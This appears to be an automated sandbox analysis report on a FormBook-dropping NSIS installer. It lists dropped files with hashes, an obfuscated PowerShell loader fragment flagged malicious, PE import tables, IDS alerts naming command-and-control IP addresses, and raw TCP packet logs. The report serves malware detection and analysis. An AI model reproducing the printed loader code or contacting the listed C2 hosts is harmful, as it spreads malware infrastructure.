                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pezydnyh.jl3.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pw3n1ob3.zah.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Frokostmder1.bes

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale -26729-77, spot sensor temperature 0.000000, unit fahrenheit, color scheme 0, show spot sensor, show scale bar, calibration: offset 0.000000, slope 2048.035400
                                                                      Category:dropped
                                                                      Size (bytes):350486
                                                                      Entropy (8bit):7.5570059600895165
                                                                      Encrypted:false
                                                                      SSDEEP:6144:ScNZS0tKvJqZI58RBWx9mX8mCy4Aikv0W2bXZZqJsTgAK0WcuqCWZOlgm8q+Rmp7:ScG0tKvJq6SRBWx98bsZqJsfK0WcuTrZ
                                                                      MD5:ECEEDEA27D2BB3FB68ED94B01BEE1A0D
                                                                      SHA1:ECD156C2C1A68114616BF333352D8151409B67FA
                                                                      SHA-256:35E455D22077DF4A6B0F825B2DC99E464BCD2DBC7FEA888BF4596C1983ACD5CE
                                                                      SHA-512:51629DE133DB230A34F1DC8255A7872230BC7CE55697E0189A4564A53B1E46B119DC64C40CC2C52BCF9FBCC2F314A78382087E67890079DD6645A2932C587C7A
                                                                      Malicious:false
                                                                      Preview:.....CC.......VV..........[.................yy.......PPPP.....................................z.........EEE......77..rr.............MM.........t..D.++.......VV...n........U...dddd..}.H........[..```........... .........................3..j.c.............*******...@....(............K.4....aa.........!........55......bbb..........V.....s............6...JJ....................................00..............<<<...........WW....ee.......................Z........w..}}................................m....ddd................................................J........p.AAA..............................OOO.......................}.......&&&....SSSS............................8...MMMM....ppp.................(((...................y...<....88.I..............ff...LL...a.........................uuu.......HHHHH.......S..................^^^^....................1..........................................................GGG.6........+..yyy.}}....GG.........................G..................................

                                                                      C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:Unicode text, UTF-8 text, with very long lines (4415), with CRLF, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):76331
                                                                      Entropy (8bit):5.1363361287083045
                                                                      Encrypted:false
                                                                      SSDEEP:1536:/U6h1M3oDTT0U1w6TdZ1M0pTfC9KDaqGETBqyO9wmvkO:1Vf0U1w6pM0pTqs2+ofwuR
                                                                      MD5:C1373F01F7AC33B18CB1471401BB5E2F
                                                                      SHA1:CD513F52017CF993655CCC29E8036B950F6CE9BA
                                                                      SHA-256:3D8BC0DF3CFB374447D2330DE65A77F07061320C4AF5D309BD17C4EA1EA06FC4
                                                                      SHA-512:CA5A7C50CE658CE6C8E4DFA9CF5A0E0FB883AB711BD5FBE792D482BB1741B7CCB465735C44C868D0AF0054FDD1646AA4FF10BCD1A532A19C3416388D90BFB82A
                                                                      Malicious:true
                                                                      Preview:$Vandplanten=$Lodowic;.....<#Disaccharose Transithandlen Readvocate Driftssystemmer #>..<#Tikroners Mulmul Buffooperas Detailvirksomhederne Semianthropological Vanhelligelsers #>..<#Ny Experimentises Piasaba Tapetbogen Aquilian Prsenterendes Forgnger #>..<#Desserttallerkenernes Stikkelen Aabenlysestes #>..<#recountment Sikkerhedsventilernes Databasesystem #>..<#Blankard Realleksikonets Resinise Solbrune Srkermet #>...$Medlemsskabernes = @'. kanto .Kajakke$Cany nepSlumpakhMilliv oWrenc et helbreoHerlu.dn pagtenoAnemarisEpiste uOp attesBladhanr skarpsvR.fluxeeAddendelMobstetiAlbuersg Jubilu=Thriges$Tal,onsWStartpue Elig bdMetasom;bilopho. ranspafS gnaliuChambranBugfinncblasto tSinklesiStopforoMineri nIncompr M,rgenFEndiablo quellerTonometsHyposynkUdskrivnT.lstediEbbesamn,athorigAmortiseKrysta r.tvningnGuslibaeunlogic federa(Srt,gca$Forh llpSystemahSiderefo eurotitUsynligoSolidarnPecul aotrichonsAn ibiouNightins ,rdist,O.ympia$PlagsomsMilieu.tNormererunderinaContempaSanctiotGen,emskFid

                                                                      C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Rakkedes.sgn

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):90140
                                                                      Entropy (8bit):1.2562832019802535
                                                                      Encrypted:false
                                                                      SSDEEP:768:Dx0VphnxojoBEFeqJOY2ts7l60O5wIbI+1+ue:V4QnP2PMF
                                                                      MD5:A5B7F2BDC17F9729B28BD7F4080B0622
                                                                      SHA1:824A5D7D34E9A986F6573A3FB23E05C2D025458E
                                                                      SHA-256:E07808B3CA49C3690996E24A303072F34B3368F1B1499431DD75D09DEC26D3B7
                                                                      SHA-512:4EE1F6ACF70EB3F19615C64D76F2A18E5AEBAE9C4F583701675556983676887DCEBF4D2772B91489FCBCE8636BEA713E830CB592C8B6661B163C302ECE1A9674
                                                                      Malicious:false
                                                                      Preview:...............o..........................................................#....."................,................................................................................U.......................................................................)..........M...$...............................U..................................C.....<.................o....................P..........W.................................................w...............................................................m....................................n...........;....................../..................................................................B..................J..........................^..............b..............................N.G...........................5.....................G..........................................................................................................................................................+........................!..#......................T.....q..

                                                                      C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Svovldioxidets144.nat

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2147483648.000000
                                                                      Category:dropped
                                                                      Size (bytes):154919
                                                                      Entropy (8bit):1.2463167010571727
                                                                      Encrypted:false
                                                                      SSDEEP:768:GUmOQqZ4NyHCYyn/xI0Q351mtmrvopO7bhJDGnjlDCWOTYeHFYMgWDAFQUvN:GnjtABShTWw
                                                                      MD5:26E9C02B074E229B86C10C9464F87417
                                                                      SHA1:8FEAD9C8B8B1D8329A40824C4ED61F4EB2AAACA3
                                                                      SHA-256:EC501E84F3F8970CF3FC36D6229E933D09FD7C48B5420E836A0BF2CA89EC8305
                                                                      SHA-512:78A1469FF0E82A5B76D3AD4BAAA3B719DFC30F9698C522926642C2DEEF52E2BD07DCA8550E0AFBFB021C8E987EE5BD33105DC3B4FCF3E683D8B6C0163C2099D6
                                                                      Malicious:false
                                                                      Preview:...%.........8...[j..f....................!........}.....................................................JY.E..........................................................................................%...........................;................,.......%..u.j.......................................................P..................................................................L.....................m.........]............................................................|.......................p.........................................../......................................................$.....................................................................t........L................c............*.....i........B....................C.....g................................................................ ............................q...........................................................................................6.............F....................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.8978229070875745
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Salmebogs(1).exe
                                                                      File size:552'510 bytes
                                                                      MD5:b5948d19a341bc22c750d129f41a55ae
                                                                      SHA1:d21d67d41f27eca213fb81f2c5d68fdee27d815d
                                                                      SHA256:0f1ec8d7d4cf99bce4bf482009f456a2e210c6d40d22802a196a2151170780ee
                                                                      SHA512:4c0507ec93cc6bc82c718f09628eb9d7694f354ba3ae927effe2eb94b5a2ccfe8fd157fd3cf1bc69fe3b656f11921e83546c013452107c5db4b0fc3d51c8c69c
                                                                      SSDEEP:12288:rqxGbI7E2Rg+JZDFBRTvfN2fhepnatv8JvtHmv:U7E2RDn5BRTvEhepngMvh
                                                                      TLSH:F1C4235836D8ECBBC5B28A328E62AE5909FEEC168D1077431325757F3E7B342C952390
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L....{.W.................b....:.....}2............@

                                                                      File Icon

                                                                      Icon Hash:9101d81c0d291d01

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x40327d
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x57807BBD [Sat Jul 9 04:21:17 2016 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 000002D4h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      pop edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+14h], ebx
                                                                      mov dword ptr [esp+10h], 0040A2E0h
                                                                      mov dword ptr [esp+1Ch], ebx
                                                                      call dword ptr [004080B0h]
                                                                      call dword ptr [004080ACh]
                                                                      cmp ax, 00000006h
                                                                      je 00007FF93C831D93h
                                                                      push ebx
                                                                      call 00007FF93C834ED4h
                                                                      cmp eax, ebx
                                                                      je 00007FF93C831D89h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082B8h
                                                                      push esi
                                                                      call 00007FF93C834E4Eh
                                                                      push esi
                                                                      call dword ptr [0040815Ch]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], 00000000h
                                                                      jne 00007FF93C831D6Ch
                                                                      push ebp
                                                                      push 00000009h
                                                                      call 00007FF93C834EA6h
                                                                      push 00000007h
                                                                      call 00007FF93C834E9Fh
                                                                      mov dword ptr [007A8A24h], eax
                                                                      call dword ptr [0040803Ch]
                                                                      push ebx
                                                                      call dword ptr [004082A4h]
                                                                      mov dword ptr [007A8AD8h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+34h]
                                                                      push 000002B4h
                                                                      push eax
                                                                      push ebx
                                                                      push 0079FEE0h
                                                                      call dword ptr [00408188h]
                                                                      push 0040A2C8h
                                                                      push 007A7A20h
                                                                      call 00007FF93C834A88h
                                                                      call dword ptr [004080A8h]
                                                                      mov ebp, 007B3000h
                                                                      push eax
                                                                      push ebp
                                                                      call 00007FF93C834A76h
                                                                      push ebx
                                                                      call dword ptr [00408174h]
                                                                      add word ptr [eax], 0000h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c50000x219e0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x61540x6200bde81925c04b8b13a9c5dc11c6cbba5fFalse0.6732700892857143data6.479248571798096IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x13a40x14002fd23f25ba6d052f3a4f032544496f73False0.453125data5.162313935974215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x39eb180x600769652d049c5b87df2f7a3908b2269c6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .ndata0x3a90000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x3c50000x219e00x21a008b27949d436016483a1692b94b0ec57dFalse0.8897319354089219data7.599236344539099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x3c54180xcdf5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9961688003793266
                                                                      RT_ICON0x3d22100x9016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9899690939651901
                                                                      RT_ICON0x3db2280x4ad3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9838162359697207
                                                                      RT_ICON0x3dfd000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4756224066390041
                                                                      RT_ICON0x3e22a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5159474671669794
                                                                      RT_ICON0x3e33500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5786247334754797
                                                                      RT_ICON0x3e41f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7134476534296029
                                                                      RT_ICON0x3e4aa00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.4121951219512195
                                                                      RT_ICON0x3e51080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5036127167630058
                                                                      RT_ICON0x3e56700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6445035460992907
                                                                      RT_ICON0x3e5ad80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5026881720430108
                                                                      RT_ICON0x3e5dc00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5675675675675675
                                                                      RT_DIALOG0x3e5ee80x100dataEnglishUnited States0.5234375
                                                                      RT_DIALOG0x3e5fe80x11cdataEnglishUnited States0.6056338028169014
                                                                      RT_DIALOG0x3e61080xc4dataEnglishUnited States0.5918367346938775
                                                                      RT_DIALOG0x3e61d00x60dataEnglishUnited States0.7291666666666666
                                                                      RT_GROUP_ICON0x3e62300xaedataEnglishUnited States0.6091954022988506
                                                                      RT_VERSION0x3e62e00x3bcdataEnglishUnited States0.4456066945606695
                                                                      RT_MANIFEST0x3e66a00x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                      USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                      ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-28T10:06:16.974137+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649724212.162.149.6380TCP
                                                                      2024-11-28T10:06:46.269126+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649725165.22.38.18580TCP
                                                                      2024-11-28T10:07:03.636386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649726154.88.22.10480TCP
                                                                      2024-11-28T10:07:06.293028+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649727154.88.22.10480TCP
                                                                      2024-11-28T10:07:09.013613+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649728154.88.22.10480TCP
                                                                      2024-11-28T10:07:11.716882+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649729154.88.22.10480TCP
                                                                      2024-11-28T10:07:18.631747+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64973069.57.163.6480TCP
                                                                      2024-11-28T10:07:21.216527+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64973169.57.163.6480TCP
                                                                      2024-11-28T10:07:23.880318+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64973269.57.163.6480TCP
                                                                      2024-11-28T10:07:26.583828+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64973369.57.163.6480TCP
                                                                      2024-11-28T10:07:33.494131+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649734104.21.6.1780TCP
                                                                      2024-11-28T10:07:36.272383+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649735104.21.6.1780TCP
                                                                      2024-11-28T10:07:39.044925+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649736104.21.6.1780TCP
                                                                      2024-11-28T10:07:41.784656+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649737104.21.6.1780TCP
                                                                      2024-11-28T10:07:48.917661+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497383.75.10.8080TCP
                                                                      2024-11-28T10:07:51.489229+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497393.75.10.8080TCP
                                                                      2024-11-28T10:07:54.136331+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497403.75.10.8080TCP
                                                                      2024-11-28T10:07:56.785215+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6497413.75.10.8080TCP
                                                                      2024-11-28T10:08:04.526932+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649742103.168.172.3780TCP
                                                                      2024-11-28T10:08:06.770860+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649743103.168.172.3780TCP
                                                                      2024-11-28T10:08:09.553131+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649744103.168.172.3780TCP
                                                                      2024-11-28T10:08:12.232707+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649745103.168.172.3780TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 28, 2024 10:06:15.618545055 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:15.738523960 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:15.738640070 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:15.739025116 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:15.858967066 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:16.974071026 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:16.974107027 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:16.974118948 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:16.974137068 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:16.974170923 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:16.974214077 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:16.974225998 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:16.974282980 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:16.974282980 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.004448891 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.004507065 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.004520893 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.004638910 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.004651070 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.004664898 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.004664898 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.004695892 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.004695892 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.094274044 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.094387054 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.094399929 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.094463110 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.184818983 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.184837103 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.184951067 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.188771009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.188826084 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.188853979 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.188882113 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.197289944 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.197361946 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.200082064 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.200189114 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.200201988 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.200228930 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.208570004 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.208635092 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.208673000 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.208715916 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.216892958 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.216959000 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.225749016 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.225804090 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.225836992 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.225886106 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.229597092 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.229718924 CET8049724212.162.149.63192.168.2.6
